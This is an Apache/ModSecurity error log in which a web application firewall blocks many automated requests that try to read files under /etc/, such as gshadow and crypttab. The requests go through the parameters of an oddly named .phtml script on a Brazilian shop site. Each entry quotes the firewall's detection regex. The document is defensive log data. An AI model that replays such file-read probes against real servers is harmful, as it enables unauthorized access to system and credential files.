[Fri Mar 20 08:55:19.847590 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.63:54490] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01p_qxLDW4GITHUkT0IQAAAQY"]
[Fri Mar 20 08:55:20.307785 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.122:54518] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01qOoXxyEfFpUF8f-LTAAAAUs"]
[Fri Mar 20 08:55:20.675831 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.13:54546] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01qPXLqtnMIWvjpaKlagAAAo8"]
[Fri Mar 20 08:55:21.071269 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.75:54588] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01qda6ubjKNq_cu4bgzAAAA0M"]
[Fri Mar 20 08:55:21.567615 2026] [:error] [pid 31215:tid 140411590858496] [client 57.141.18.37:54618] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01qQF0L0L-SsrnPo5zlwAAAtI"]
[Fri Mar 20 08:55:22.216337 2026] [:error] [pid 11642:tid 140411674785536] [client 57.141.18.64:54658] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01qrninkcc-iUj5ApoNQAAA4g"]
[Fri Mar 20 08:55:24.124270 2026] [:error] [pid 31215:tid 140411741927168] [client 57.141.18.16:54698] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01qwF0L0L-SsrnPo5znAAAAsA"]
[Fri Mar 20 08:55:24.127233 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.55:54688] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01qvqxLDW4GITHUkT0JAAAARY"]
[Fri Mar 20 08:55:24.131677 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.4:54716] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01q7ninkcc-iUj5ApoOgAAA5Q"]
[Fri Mar 20 08:55:24.134936 2026] [:error] [pid 11642:tid 140411565680384] [client 57.141.18.54:54706] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01q7ninkcc-iUj5ApoOQAAA5U"]
[Fri Mar 20 08:55:24.262708 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.112:54738] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rNa6ubjKNq_cu4bgzgAAA0A"]
[Fri Mar 20 08:55:24.627189 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.96:54742] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rBCii7xarUs8iHZyNQAAAgM"]
[Fri Mar 20 08:55:24.755282 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.87:54758] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rNa6ubjKNq_cu4bgzwAAA0I"]
[Fri Mar 20 08:55:25.405945 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.73:54782] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rfXLqtnMIWvjpaKldgAAAo0"]
[Fri Mar 20 08:55:25.490727 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.73:54786] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rfXLqtnMIWvjpaKldwAAAo8"]
[Fri Mar 20 08:55:27.278699 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.72:54802] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rl1pVZ5mVmJwsFM8aAAAAFQ"]
[Fri Mar 20 08:55:27.278991 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.24:54808] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01r_qxLDW4GITHUkT0JgAAAQw"]
[Fri Mar 20 08:55:27.282747 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.51:54804] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rjJ3M9BSuKP7CAYpcwAAAIQ"]
[Fri Mar 20 08:55:27.302613 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.8:54806] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01rl1pVZ5mVmJwsFM8agAAAFg"]
[Fri Mar 20 08:55:27.880438 2026] [:error] [pid 11167:tid 140411649607424] [client 57.141.18.25:54828] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01r_HIg5MgXLBnicMBgQAAAcs"]
[Fri Mar 20 08:55:27.883754 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.37:54830] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01r9a6ubjKNq_cu4bg0AAAA1Q"]
[Fri Mar 20 08:55:28.354052 2026] [:error] [pid 7893:tid 140411599251200] [client 57.141.18.21:54842] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sBCii7xarUs8iHZyNgAAAhE"]
[Fri Mar 20 08:55:28.613162 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.92:54848] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sPqxLDW4GITHUkT0JwAAAQc"]
[Fri Mar 20 08:55:29.491165 2026] [:error] [pid 10189:tid 140411725141760] [client 57.141.18.94:54864] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sTJ3M9BSuKP7CAYpdQAAAII"]
[Fri Mar 20 08:55:29.514891 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.83:54866] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release-cpe"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sfHIg5MgXLBnicMBggAAAc0"]
[Fri Mar 20 08:55:29.899519 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.66:54880] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sTJ3M9BSuKP7CAYpeAAAAIw"]
[Fri Mar 20 08:55:30.379958 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.101:54890] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/krb5.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sta6ubjKNq_cu4bg0QAAA0o"]
[Fri Mar 20 08:55:30.670146 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.95:54896] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01sta6ubjKNq_cu4bg0gAAA0c"]
[Fri Mar 20 08:55:31.159506 2026] [:error] [pid 31215:tid 140411548894976] [client 57.141.18.114:54906] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab01swF0L0L-SsrnPo5znwAAAtc"]
